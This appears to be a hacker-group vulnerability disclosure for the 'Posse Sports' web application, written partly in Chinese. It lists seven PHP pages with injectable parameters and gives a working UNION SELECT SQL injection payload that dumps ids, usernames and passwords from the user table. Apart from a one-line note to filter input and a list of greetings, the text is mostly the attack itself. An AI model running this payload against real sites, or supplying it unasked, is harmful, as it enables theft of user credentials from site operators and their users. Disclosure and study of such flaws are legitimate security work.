标题: Posse Sports SQL Injection Vulnerabilitiy
作者: H4ckCity Security Team farbodmahini WwW.H4ckCity.Org
程序地址:
影响所有版本
测试平台: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
示例
#  /newsdetail.php?news_id=[SQL]
#  /dirdetails.php?iddirector=[SQL]
#  /tdetails.php?idtourn=[SQL]
#  /tresults.php?tourn_id=[SQL]
#  /tournsearch.php?idclass=[SQL]
#  /fieldinfo.php?idfield=[SQL]
#  /page.php?id=[SQL*]
#
#  [~] SQL* :
#
#  -9999+union+select+1,2,group_concat(id,0x3a,username,0x3a,password)+from+user
 
修复方案
 
过滤上面页面参数输入
#致谢
 
 : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-
# IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,...